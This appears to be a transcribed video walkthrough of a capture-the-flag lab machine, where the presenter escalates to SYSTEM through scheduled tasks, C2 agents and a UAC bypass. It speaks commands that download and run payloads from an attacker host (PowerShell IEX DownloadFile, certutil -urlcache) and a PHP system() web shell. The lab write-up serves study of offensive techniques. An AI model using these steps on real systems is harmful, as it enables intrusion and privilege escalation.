cmd/c. Type. So let's see. That didn't work. It just spawned a new command shell. And now we exited. Interact. 4.5. CMD. Let's see if we get a shell. I may have to do another agent. Back agent list. Because it says it's delayed, so I don't know exactly what delayed means. Maybe it's just delayed on calling back. Yeah, that's what it means. Okay, so not exactly sure why that scheduled task isn't working. Trying to think. I guess let's try cmd/k and see if it works this way. And if this doesn't work, we're going to go back into the web stuff, because I think I have an idea there. Operable program or batch file. Maybe it doesn't like me echoing stuff in. Let's go see users, Raziel, app data, local, temp, XYZ. Okay, so let's do IEX, new object, net.web client, download file instead of string, HTTP 10.10.14.2. We'll call this test.bat, and we'll place it in test.bat. Try it this way. And this will be v test.bat, c:\users public thanks.exe, and we'll also ping 10.10.14.2. Okay. Oh, I'm in PowerShell. I probably need /. No, this is scheduled task running. Never mind. I'm an idiot there. Let's see. Did I call that before I started the web server? IEX new object. Download file. Can we delete test.bat. Now write this. Okay. Because it is null. Why do you say null? IX, new object, net.webclient, download file. I wonder if some type of PowerShell restriction is hitting me here. Test.bat. Okay, so let's try the certutil method. We're definitely getting the file. It's just not writing the file, which is odd. Echo test to test. Yeah, I can write files, so I don't know why it's erroring. So certutil URL cache split f 10.10.14.2 test.bat test.bat. Did that save? It saved. Schedule task, run, task name, system maintenance. Tempted to run. So this time it definitely ran. We did a schedule task run, system maintenance. We got the ping, and we get a call it back. So it doesn't like echoing. That is bizarre. If we do cmd who am I, we'll probably get system. So we can go back, and I'm going to try that PHP thing again. Shells, cd backslash, cd wamp 64, cd dub. Let's delete please sub.php. We can get out of this TCP dump. We can v please sub.php, php system, request, ipsec. You know what? When I get color in my syntax, I'm actually remembering how to type that a lot better. Maybe it's just like a subconscious thing of saying all white that makes me forget. That's like muscle memory to the maximum. So we got please sub here. So let's do that certutil magic again. Let's see. Certutil. Please subscribe.php. And I'll say, I bet Unicode sucks.php. Failed. Why'd you fail? Please subscribe. Please sub. If I can have a decent memory, that would help. .php. I bet Unicode sucks.php. There we go. Now if we go to I bet Unicode sucks.php. That looks like a PHP error. Yep. So what I say? ipsec equals who am I? And tier 30 system. So here we go. Machine is finally done. It was something with freaking Unicode. Let's see. dir c:users administrator. See if that works. cmd dir c:users. I think now this shell is bypassed UAC by that scheduled task. So if this cmd, this returns the contents of administrator, I know it worked. Because if we run the same command on our shell, we'll get access denied. Access denied. Maybe one day that will return. And this is definitely system because it's running as system. So temp thanks.exe. Got a new agent. So you give this another 10 to 15 seconds. Let's see. Back, agent list. So we know this one is active. Now maybe that CMD failed. Interact with this CMD dir c : users administrator. But you'll definitely know this is not going to be UAC'd because it is the system. Just trying to prove all this is annoying because of the 30-second wait for check-ins. Back, interact, 40D. Let's go back to shells, exit, Merlin. Oh god. Oh, that's because that agent checked in. CMD, PowerShell, run that. Let's see. Yeah, these are all my error messages trying to download file. And I wasn't listening when I ran that PowerShell command. So now we gotta wait probably 30 seconds and we'll get this shell. And this is the UAC bypassed one. And then the next thing we'll do is the system shell. So let's see. That ran, maybe. Agents. Agent list. Interact. 35. Shells. CD / CD users. CD administrator. And now we can go into this directory. And we see root.txt is 32 characters, and we're still Raziel. So we're no longer UAC'd. If we exit this, listen on 9001, and we're 35FF. This is the NT-authority system one. Run CMD again. Oh, darn it. PowerShell. Maybe we wanted CMD/C. We're getting exec error dir not found in path. So maybe CMD dir just doesn't work. But PowerShell, this should get us a callback probably in 30 seconds since as I typed that, we got dir executable not found. So that missed a check-in. Info. Just wait here. Probably 20 seconds. Or now. Now works too. It's loading the shell. Who am I? System. And now we can go users, administrator, and do that. So that is the box. I hope you guys enjoyed it. Sorry that whole snafu in near the end of it with all those things just not executing. I was like, I know I'm doing all these commands right. I don't know what's going on, but today I learned don't echo stuff into like a .bat file in PHP and just magically expect it to work. I'm guessing that works from like interactive shell, but Nishang probably changes it from like UTF-16 little endian to ASCII or something. I don't know. I'd have to check exactly what encoding the file was, but it's definitely something with file encoding why that didn't work. So, or I'm 80% confident that's the reason. Anywho, take care, and I will see you next week.